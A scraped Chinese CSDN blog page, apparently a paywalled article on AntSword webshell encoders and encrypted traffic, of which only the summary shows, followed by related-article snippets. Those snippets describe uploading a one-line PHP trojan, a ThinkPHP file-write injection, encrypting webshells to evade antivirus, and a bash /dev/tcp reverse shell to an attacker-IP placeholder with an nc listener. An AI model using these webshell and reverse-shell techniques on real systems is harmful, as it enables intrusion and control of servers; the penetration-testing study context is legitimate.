蚁剑webshell动态加密连接分析与实践

最新推荐文章于 2024-10-26 17:16:52 发布
最新推荐文章于 2024-10-26 17:16:52 发布
阅读量2.4k 收藏 4
点赞数
分类专栏: 全栈网络安全 渗透测试 代码审计 网络安全工具开发 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35029061/article/details/126133177
版权
本文详细分析了蚁剑(AntSword)的编码器,包括php的chr和rot13编码器,以及如何自定义编码器。探讨了蚁剑的webshell动态加密连接,使用trait在PHP 7中的应用,以及静态调用非静态函数的方法。通过流量分析,揭示了蚁剑加密流量的工作原理,并给出了连接和执行命令的实践步骤。
摘要由CSDN通过智能技术生成

一、蚁剑编码器

蚁剑采用了Electron打包作为外壳,ES6 ,dhtmlx,Nodejs 作为前端代码编写语言,搭配Babel&&Webpack进行组件化构建编译,外加iconv- lite编码解码模块以及superagent数据发送处理模块还有nedb数据存储模块,从2.0版本开始,引入了加载器这一概念。

用户/开发者只需要下载对应平台的加载器,无需安装额外的环境,即可对源代码进行编辑/执行/调试等操作。可直接运行当前最新的开发版和发行版源代码。

模块介绍 

在蚁剑自带的编码器中,存在base64、chr、chr16、rot13四种编码器,此外,官方还提供了一些其他另类的编码器。

了解本专栏 订阅专栏 解锁全文 超级会员免费看
wespten
关注
专栏目录
订阅专栏
加密 WebShell 过杀软
悦分享
08-03 2269
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国推崇模块化的开发思想,遵循开源,就要开得漂亮的原则, 致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及 其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展出最人性化最适合你的能力!通俗的讲:中国与中国菜刀相比,界面更加美观、功能更加齐全,并且自定义的程度更高且开放源代码。...
【网络安全】AntSword新手快速入门(附实战案例)
等风来
04-27 6780
(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国的特点主要有如下几点:1.支持多平台。包括macOS、Linux 32位、Linux 64位、Linux armv7l、Linux arm64、Windows 32位、Windows 64位。2.完善的文档。中国文档地址。3.多项功能。文件管理功能、虚拟终端功能、数据库管理功能。4.内置代理功能。
一句话木马构造与连接
qq_52395989的博客
08-16 2759
1.上传文件含一句话木马的shell.php,复制图片链接http://2095b394-7d95-4957-bd2e-1d3e5fe29b34.node4.buuoj.cn:81/upload/shell.php。2.准备一张图片和muma.php放在同一个文件夹中,cmd进入该文件夹。1.创建一个txt文档,把上述命令写入,保存为muma.php。2.打开——>添加数据。3.最后点击添加就完成了。
php webshell 加密代码
Yatere的天平秤
04-07 1793
import re import sys import base64, codecs from random import random, randrange, choice, shuffle, randint from collections import * from inspect import getargspec def random_string(charset = 'abcdefgh
连接建立
最新发布
2301_79621623的博客
10-26 292
中国支持Windows、Linux、macOS等多个操作系统,用户可以在不同的平台上无缝使用,它还支持多种脚本语言,包括PHP、ASP、ASPX、JSP等,能够广泛应用于不同类型的网站管理。通过中国,用户可以轻松实现对网站各项指标的实时监控,包括但不限于服务器状态、流量统计、日志分析等。打开,右键添加数据,连接密码即为一句话木马里自己定义的连接指令,编码器可以随便选,连接不成功就换一个,保存即可创建成功。在此页面打开终端,我们可以通过指令获取连接机器的各种信息了。创建好后,单机选项即可连接
中国连接远程shell
weixin_48823354的博客
09-15 2997
1、通过构造a参数的display()方法,实现任意内容包含漏洞 ?a=display&templateFile=README.md 通过构造a参数的fetch()方法,不需要知道文件路径就可以实现任意文件写入 ?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’) 执行,页面是空白的 访问test.php,
用ZendGuard 加密php webshell
Coisini的博客
06-09 510
现在很多linux管理员都会一招,grep eval 大法,查找那些年错过的webshell,那些年错过的基友们苦思冥想出了对抗的办法。 ZendGuard是一款php的加密工具,它可以编译php源码变为字节码,类似于java的虚拟机的字节码,然后让zend虚拟机运行字节码,以此来提高php的运行速度,因为不用虚拟机,php运行脚本的方式是读一行代码,运行一行,效率很低,而虚拟机则效率高多了,题...
m0_64338211的博客
01-16 1374
1.编写一句话木马,并命名为post.php 2.利用""连接靶机上的post.php (1)打开中国 (2)在“中国"主界面空白处单击鼠标右键,在弹出的菜单中选择"添加数据" 添加一条Webshell管理项 3、利用“中国"对靶机进行虚拟终端及文件操作 (1)虚拟终端操作 打开虚拟终端界面后,可以像操作本地机器一样,对靶机执行一些操作系统命令 (2)文件操作、数据操作 ...
分离Weevely加密模块加密任意WebShell
blrk
03-22 1204
http://www.freebuf.com/tools/7875.html
php加密webshell上传,php webshell 加密代码
weixin_30299099的博客
03-25 256
import reimport sysimport base64, codecsfrom random import random, randrange, choice, shuffle, randintfrom collections import *from inspect import getargspecdef random_string(charset = 'abcdefghijklmn...
强大的webshell管理工具——
12-26
中国,免费拿走,自己踩过的坑,不想别人再踩
AS_ASPX_AES_ENCODE:AES加密通信ASPX Webshell
07-24
AS_ASPX_AES_ENCODE Webshell就是在ASPX页面中植入的代码,当连接到这个Webshell时,会通过AES加密方式发送命令和接收返回的数据。这种加密通信方式显著增强了Webshell的生存能力和抵抗检测的能力。 要实现AES...
webshell链接工具
04-13
2. **安全研究**:研究人员通过分析WebShell的特性,研究其工作原理,以提高防御策略。 3. **应急响应**:在遭受WebShell攻击后,安全团队可以使用清理恶意代码,修复受损系统。 4. **教育训练**:在网络...
中国 webshell工具
08-12
中国
中国webshell管理工具
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
04-28 911
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,比菜刀功能更加丰富的webshell管理工具
php webshell代码混淆,php webshell 加密代码
weixin_30562757的博客
03-21 246
import reimport sysimport base64, codecsfrom random import random, randrange, choice, shuffle, randintfrom collections import *from inspect import getargspecdef random_string(charset = 'abcdefghijklmn...
WEBSHELL的加解密
weixin_34345560的博客
12-23 463
***过程中,小黑们费尽苦心上传了WEBSHELL,别人可能会坐收渔翁之利。今天给大家介绍的是WEBSHELL加密,保护小黑的WEBSHELL密码。1、ASP类型的WEBHELL加密和解密ASP类型的WEBSHELL加密一般使用微软的Windows Script Encoder,这是一个命令行的加密工具。安装后会生产screnc.exe这个文件,加密代码就靠它了,其实把这个...
连接两个形式--免杀
m0_68976043的博客
03-13 940
大致的意思会输出一些内容 随机字符串+环境变量+随机字符串,如果用eval代替assert是完全没问题的,我查了下资料,assert是不能执行多个语句的,eval可以,所以这里使用assert会有返回为空的问题。这里简单来说就是eval函数中参数是字符,如:eval('echo 1;assert函数中参数为表达式 (或者为函数),如:assert(phpinfo())这个问题可以使用base64编码的问题解决,编码后的数据包,可以看到ant这个参数传入的是一句话,因此就可以通过assert执行成功。
连接数据库后,解决执行一直转圈的问题
pa3da的博客
08-07 567
由于本人最近遇到连接数据库后解决执行一直转圈的问题。如果使用加载器启动的,看看自己是不是下载的源码(有master字样的),而非release版本,工作目录得是源码。
不用怎么反弹shell
12-07
反弹shell是指攻击者通过漏洞获取被攻击主机的shell权限,从而控制被攻击主机。下面是一种不使用的反弹shell方法: 1.攻击者需要在自己的机器上开启监听服务,例如使用netcat命令: ```shell nc -lvnp 4444 ``` 其中4444是监听端口号。 2.攻击者需要在受害主机上执行反弹shell的命令,例如使用bash反弹shell: ```shell bash -i >& /dev/tcp/攻击者IP/4444 0>&1 ``` 其中“攻击者IP”是攻击者机器的IP地址,4444是攻击者机器上开启的监听端口号。 3.当受害主机执行反弹shell命令后,攻击者就可以在自己的机器上获取到受害主机的shell权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wespten

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值